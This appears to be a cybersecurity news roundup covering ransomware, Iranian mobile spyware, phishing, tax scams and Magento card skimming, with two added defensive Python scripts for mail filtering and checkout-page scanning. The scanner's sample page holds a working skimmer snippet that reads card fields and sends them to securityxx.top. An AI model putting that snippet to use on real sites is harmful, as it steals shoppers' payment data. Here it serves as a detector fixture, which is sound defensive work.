On Tuesday, CD Projekt Red disclosed that it had been the victim of a ransomware attack. “Some of our internal systems have been compromised,” the company said in a statement posted on Twitter. The attackers encrypted some machines and stole data, but CD Projekt Red said it would not pay the ransom and was restoring its systems from backups. The incident comes after CD Projekt Red faced weeks of sustained criticism for its bug-ridden, overhyped Cyberpunk 2077 release. The game had so many performance problems across platforms that Sony pulled it from the PlayStation Store and, together with Microsoft, offered refunds to players.

Despite the company's recovery efforts, it still faces potential fallout. The attackers apparently took source code for Cyberpunk 2077 and other CD Projekt Red games, including The Witcher 3, an unreleased version of The Witcher 3, and Gwent, the digital Witcher card game. They also claim to have taken business data covering investor relations, human resources, and accounting. CD Projekt Red says there is no evidence that customer data was compromised in the breach.

“If we will not come to an agreement, then your source code will be sold or leaked online and your documents will be sent to our contacts in gaming journalism,” the attackers said in their ransom note. 

CD Projekt Red has released patches for Cyberpunk 2077 in an effort to improve the game's stability and limit the damage. But the company still faces a lawsuit from investors alleging that it forced developers into excessive overtime to finish the game, and criticism of its use of nondisclosure agreements that kept journalists from reporting accurately on the game's shortcomings before release.

Domestic Kitten - An Iranian Surveillance Operation


Check Point researchers recently revealed the full extent of Domestic Kitten's broad surveillance operation against Iranian citizens who could pose a threat to the stability of the Iranian regime. The operation is attributed to the Iranian government and carried out by APT-C-50. Active since 2017, it has comprised 10 distinct campaigns, targeted more than 1,200 individuals, and achieved more than 600 successful infections. Four campaigns are still active, the latest of which began in November 2020. In these campaigns, victims are lured into installing a malicious application through various vectors, including an Iranian blog site, Telegram channels, and even SMS messages carrying a link to the malicious app.

The victims include prominent academics, activists and business leaders in Iran and elsewhere, as well as government officials in the United States and Europe, researchers at Israeli cybersecurity firm Check Point said in a pair of reports released on Monday.

The APT uses mobile malware called FurBall. The malware is based on commercially available monitoring software called KidLogger, and according to the researchers, "it seems that the developers either obtained the KidLogger source code or reverse-engineered a sample and stripped all extraneous parts, then added more capabilities." FurBall is distributed through a variety of attack vectors, including phishing, Iranian websites, Telegram channels, and SMS messages containing a link to the malware. It uses a range of disguises to trick the victim into installing it, such as posing as "VIPRE" mobile security, masquerading as a news outlet app, or being repackaged into legitimate mobile games from Google Play and other app stores, restaurant service apps, and wallpaper applications.

Once installed on a target device, FurBall can intercept SMS messages, collect call logs, gather device information, record communications, steal media and stored files, monitor the device's GPS coordinates to track the target's movements, and more. Data harvested from the compromised device is sent to command-and-control (C2) servers that Domestic Kitten has used since 2018. The associated IP addresses were located in Iran, in both Tehran and Karaj.

On Monday, Check Point researchers, together with SafeBreach, also exposed the activity of a second threat group that is actively targeting Iranian dissidents, but one that goes after their PCs rather than their smartphones.

Microsoft Office Phishing Attack Hosted on Google Firebase


A phishing campaign aimed at stealing Microsoft login credentials is using Google Firebase to get past email security controls in Microsoft Office 365, researchers said.

Researchers at Armorblox found invoice-themed emails sent to at least 20,000 mailboxes that purport to share details of an electronic funds transfer (EFT) payment. The emails carry a fairly plain subject line, “TRANSFER OF PAYMENT NOTICE FOR INVOICE,” and contain a link to download an “invoice” from the cloud.

Clicking the link starts a chain of redirects that eventually lands the target on a page with Microsoft Office branding hosted on Google Firebase. That page is a credential-harvesting form, designed to collect Microsoft login details, secondary email addresses, and phone numbers. “Since all workplace accounts are so closely interlinked, sharing credentials to one of your accounts can prove to be very dangerous as cybercriminals send emails in your name to trick your customers, partners, acquaintances and family members,” according to Armorblox.

Impersonating Microsoft to phish for account credentials remains an effective technique because it lets attackers insert themselves into routine business workflows, said Rajat Upadhyaya, head of engineering at Armorblox. “Viewing documents via Office 365 is something we do every day, so victims might think it’s not unusual to enter login credentials in this situation,” Upadhyaya added. “Plus, hosting the final phishing page on Google Firebase lends the domain inherent legitimacy and allows it to bypass email security blocklists and filters.”

The email attack bypassed Microsoft's native email security controls. Microsoft assigned the email a Spam Confidence Level (SCL) of 1, meaning its filters did not judge the message suspicious and delivered it to end-user mailboxes. Notably, by hosting the phishing page HTML on Google Firebase, a domain with a good reputation, the emails were able to slip past Microsoft's built-in filters, including Exchange Online Protection (EOP) and Microsoft Defender for Office 365.

For better protection against email-borne threats, Armorblox recommends that employees treat emails about money or data with an “eye test”: checking the sender name, the sender email address, the language in the email, and any logical inconsistencies within it.
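The practical lesson of this campaign is that a low SCL only says Microsoft's filters found nothing wrong; it does not vouch for a link whose host sits on a hosting service where anyone can publish. The following is an added example written for this post, not Armorblox's or Microsoft's code: a small mail-flow rule that re-scores a message carrying a payment lure in the subject together with a link to such hosting, regardless of the SCL stamped on it. The sample message is constructed, and the header name, the list of hosting suffixes and the lure terms are assumptions made for the illustration.

```python
"""Added example (not Armorblox's or Microsoft's code): re-score messages
that Exchange Online delivered with a low SCL when they pair a payment lure
with a link to a publish-anything hosting service. The sample message, the
header name, the hosting suffixes and the lure terms are assumptions.
"""
import re
from email import message_from_string
from email.message import Message
from urllib.parse import urlparse

SCL_HEADER = "X-MS-Exchange-Organization-SCL"

# Hosting services where anyone can publish HTML under a reputable parent
# domain (assumed list; extend from your own telemetry).
SHARED_HOSTING_SUFFIXES = (".firebaseapp.com", ".web.app")

LURE_TERMS = ("invoice", "payment", "transfer", "remittance", "eft")

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)

# Constructed sample shaped like the campaign described: plain subject,
# SCL of 1, and a link that lands on shared hosting.
SAMPLE = """\
From: accounts@example-supplier.test
To: finance@example.test
Subject: TRANSFER OF PAYMENT NOTICE FOR INVOICE
X-MS-Exchange-Organization-SCL: 1
Content-Type: text/plain; charset=utf-8

Please review the EFT remittance advice for your records:
https://invoice-portal-4a1b.web.app/view.html?id=30019
"""


def body_text(msg: Message) -> str:
    """Concatenate text/plain and text/html parts so links in either are seen."""
    parts = msg.walk() if msg.is_multipart() else [msg]
    chunks = []
    for part in parts:
        if part.get_content_type() in ("text/plain", "text/html"):
            payload = part.get_payload(decode=True) or b""
            chunks.append(payload.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)


def shared_hosting_links(text: str) -> list:
    """Return the URLs whose host sits on a shared hosting parent domain."""
    hits = []
    for url in URL_RE.findall(text):
        host = (urlparse(url).hostname or "").lower()
        if host.endswith(SHARED_HOSTING_SUFFIXES):
            hits.append(url)
    return hits


def assess(raw: str) -> dict:
    """Combine the SCL with our own lure-plus-hosting check and return a verdict."""
    msg = message_from_string(raw)
    scl = int(msg.get(SCL_HEADER, "-1"))
    subject = (msg.get("Subject") or "").lower()
    lure = any(term in subject for term in LURE_TERMS)
    links = shared_hosting_links(body_text(msg))
    # A money lure plus a link to publish-anything hosting is enough to hold
    # the message for review even though the platform scored it as clean.
    verdict = "quarantine" if (lure and links) else "deliver"
    return {"scl": scl, "lure": lure, "links": links, "verdict": verdict}


if __name__ == "__main__":
    print(assess(SAMPLE))
```

The rule only sees the first hop of the link; the campaign described above reaches Firebase through a chain of redirects, so in production the same check would be run against the final landing host after following redirects in a sandbox, or the shared-hosting suffixes would be matched against URL-rewriting click telemetry rather than the raw body.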

Serco Confirms Babuk Ransomware Attack


Outsourcing giant Serco has confirmed that parts of its infrastructure in mainland Europe were hit by a double-extortion ransomware attack from the new Babuk group, though the parts of its operation supporting the NHS Test and Trace programme are unaffected. “Serco’s mainland European business has been subject to a cyber-attack,” a Serco representative said. “The attack was isolated to our continental European business, which accounts for less than 3% of our overall business. It has not impacted our other business or operations.”

The incident comes as security firms and insurers increasingly warn that digital extortionists learn from other attackers' techniques, outsource parts of their operations, and rely on partnerships to infiltrate victim networks. Although the NHS Test and Trace programme was unaffected, ThreatConnect EMEA vice-president Miles Tappin said the vulnerabilities in Serco's wider systems were of great concern, and that the Babuk attack exposed “inherent weaknesses of the system”.

“Like many actors new to the world of ransomware, the actor behind Babuk ransomware has been learning on the job while drawing insights from other criminal groups,” said Allan Liska, an intelligence analyst at the threat intelligence company Recorded Future. In the ransom note, Babuk's operators claimed to have had access to Serco's systems for three weeks and to have already exfiltrated a terabyte of data. The criminals made explicit references to Serco partners, including NATO and the Belgian Army, and threatened Serco with consequences under the General Data Protection Regulation (GDPR).

The attackers have demanded ransoms of $60,000 to $85,000, though that is “likely to increase over time as the threat actor becomes more experienced in ransomware operations,” according to a private analysis from PricewaterhouseCoopers obtained by CyberScoop. Babuk is far from sophisticated. Its code has contained mistakes that prevented it from executing on some targeted computers, according to PwC. “We assess that, due to a disregard for error checking, Babuk would fail to execute altogether in some environments,” the analysis says.

But while Babuk is still a relatively low-level threat to organizations, according to Liska, that could change if its operators make more money from attacks and invest in new capabilities.

Fraudsters are Using Fake W-8BEN Forms for 2021 Tax Season


As huge numbers of US taxpayers prepare for the 2021 tax season, swarms of fraudsters and scammers are preparing to rip off residents and non-residents alike. Fraudsters got an early start anticipating the buzz around tax filing season, with phishing campaigns impersonating the IRS as early as November 25, 2020, according to Bitdefender Antispam Lab. Spikes in IRS-related phishing scams were seen on January 19 and 21, when the majority of incoming agency-related correspondence was marked as spam.

Authorities say huge numbers of people, from ordinary residents to sophisticated professionals, fall prey to IRS and other scams every year, losing millions of dollars in the process. According to a Federal Trade Commission (FTC) report, imposter scams cost Americans some $667 million in 2019, and those were only the cases reported to authorities. Many victims never file reports, often out of embarrassment.

This early start was no coincidence: in fiscal year 2020, roughly $2.3 billion was tied to tax fraud, according to the agency's annual report. Identity thieves used stolen Social Security numbers and other personally identifiable information (PII) to file early tax returns in the names of legitimate taxpayers, or used scare tactics to frighten recipients into making immediate payments to avoid arrest or deportation.

Fraudsters are targeting non-residents in the US with a fake version of Form W-8BEN (Certificate of Foreign Status of Beneficial Owner for United States Tax Withholding and Reporting) to steal sensitive information. This version of the scam has been seen more than 80,000 times since November 25, 2020, with further spikes expected to hit inboxes until April 15. Unlike traditional phishing, which relies on recipients visiting a spoofed website or opening a malicious attachment, the scammers have set up a fake fax number to which recipients are told to send their details. The fake form asks for information the genuine W-8BEN does not, such as passport number, occupation, mother's maiden name, bank account name and number, and investment holdings.

Fraudsters have also recycled older versions of IRS impersonation scams by using the Economic Impact Payments under the Coronavirus Aid, Relief, and Economic Security (CARES) Act as a lure.

Outdated Magento 1 Sites Hit by Credit Card Skimming Threats


Magento is an open-source e-commerce platform that gives online merchants a scalable shopping cart system and lets them manage their store's layout, content, and features. Recently, threat actors began exploiting a flaw in the ‘Magento 1’ branch, which reached end of life in 2020 and is no longer maintained.

Thousands of retailers worldwide still on that branch are being urged to upgrade to ‘Magento 2’ after thousands of e-commerce sites were hacked and infected with credit card skimming code. While tracking events related to the Magento 1 campaign, researchers observed one e-commerce shop that had been attacked twice by skimmers.

In this case, the second group of threat actors built a version of their skimmer that recognizes sites already injected by the Magento 1 skimmer. The second skimmer simply collects credit card data from the fake form that the earlier actors had already injected.

"A large number of Magento 1 sites have been hacked but are not necessarily being monetized yet,” a Malwarebytes researcher said. He added that “Other threat actors that want access will undoubtedly attempt to inject their own malicious code. When that happens, we see criminals trying to access the same resources and sometimes fighting with one another.”

The end of life of Magento 1, combined with a well-known exploit, was a windfall for threat actors. Many sites were compromised indiscriminately simply because they were vulnerable. RiskIQ has attributed these incidents to Magecart Group 12, which uses a variety of tactics, including supply-chain attacks, and has a long history of web skimming.

Two web skimmers were found on the payment pages of Costway, a leading retailer of appliances, furniture and similar goods in North America and Europe. The skimmers harvest consumers' credit card details. “Our crawlers identified that the websites for Costway France, U.K., Germany, and Spain, which run the Magento 1 software, had been compromised around the same time frame,” said researchers.

On the Costway checkout page, the researchers noticed the injected credit card skimmer, which stands out because it is in English while most of the site is in French. That is no surprise given how automated and indiscriminate the Magento 1 hacking campaign is.

The exposure is large: researchers say that in December 2020 alone, Costway's French site (Costway[.]fr) received approximately 180,000 visitors. There is also a second skimmer on the site (loaded externally from securityxx[.]top), which targets the form planted by the Magento 1 skimmer.

Many Magento 1 websites have been compromised but not yet monetized. Additional attackers will almost certainly keep injecting their own malicious code into them.
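The double injection described above has a useful property for defenders: the fake card form, the inline code that reads it, and the second-stage loader from an outside domain all sit in the checkout page's HTML, so a store owner can find them by scanning a saved copy of that page offline. The following is an added example written for this post, not code from Malwarebytes, RiskIQ or Magento: it parses a checkout page, reports script sources outside the store's own origins, inline scripts that touch card fields or send data elsewhere, and prints a Content-Security-Policy that would have blocked the external loader. The sample HTML is constructed to mimic the described scenario; the store origins, field names and hints are assumptions made for the illustration.

```python
"""Added example (not Malwarebytes', RiskIQ's or Magento's code): an offline
checker for a saved checkout page that flags third-party script sources,
inline scripts that read card fields or call out to other hosts, and the
card inputs themselves. The HTML, store origins, field names and hints
below are assumptions constructed for the illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

FIRST_PARTY = {"shop.example", "static.shop.example"}  # assumed store origins
CARD_HINTS = ("cc_number", "cc_cid", "cardnumber", "cvv", "cvc")
HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)

# Constructed checkout page shaped like the described double injection:
# a loader pulled from an outside domain plus an inline script that reads
# the card form and sends it off-site.
SAMPLE_CHECKOUT = """<html><head>
<script src="https://static.shop.example/js/checkout.js"></script>
<script src="https://securityxx.top/loader.js"></script>
</head><body>
<form id="payment" action="/checkout/onepage/savePayment">
  <input name="cc_number"><input name="cc_cid">
</form>
<script>
  var f=document.getElementById('payment');
  f.addEventListener('submit',function(){
    var d=btoa(f.cc_number.value+'|'+f.cc_cid.value);
    new Image().src='https://securityxx.top/gate?d='+d;});
</script>
</body></html>"""


class CheckoutScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.external_scripts = []    # <script src> not on a first-party host
        self.inline_card_scripts = [] # inline scripts that mention card fields
        self.exfil_hosts = set()      # hosts referenced from inline scripts
        self.card_inputs = []         # inputs whose name looks like card data
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            src = a.get("src")
            if src:
                host = (urlparse(src).hostname or "").lower()
                if host and host not in FIRST_PARTY:
                    self.external_scripts.append(src)
            else:
                self._in_script, self._buf = True, []
        elif tag == "input":
            name = (a.get("name") or a.get("id") or "").lower()
            if any(h in name for h in CARD_HINTS):
                self.card_inputs.append(name)

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._buf)
            low = body.lower()
            if any(h in low for h in CARD_HINTS):
                self.inline_card_scripts.append(body.strip()[:80])
            for host in HOST_RE.findall(body):
                if host.lower() not in FIRST_PARTY:
                    self.exfil_hosts.add(host.lower())


def scan(html: str) -> dict:
    """Run the scanner over one page and return its findings."""
    p = CheckoutScanner()
    p.feed(html)
    p.close()
    return {
        "external_scripts": p.external_scripts,
        "inline_card_scripts": p.inline_card_scripts,
        "exfil_hosts": sorted(p.exfil_hosts),
        "card_inputs": p.card_inputs,
    }


def csp_for(first_party) -> str:
    """A script-src that only permits the store's own origins; any loader
    from another host, such as the second-stage one above, is refused."""
    hosts = " ".join(sorted("https://" + h for h in first_party))
    return f"Content-Security-Policy: script-src 'self' {hosts}; form-action 'self'"


if __name__ == "__main__":
    for key, value in scan(SAMPLE_CHECKOUT).items():
        print(f"{key}: {value}")
    print(csp_for(FIRST_PARTY))
```

A scan like this catches the injection that is on the page at crawl time; it does not catch a skimmer the first-party script itself was modified to contain, which is why the findings are worth diffing against a known-good copy of the checkout, and why the CSP at the end matters more than the detection: with an allowlisted script-src, the securityxx[.]top loader simply never runs.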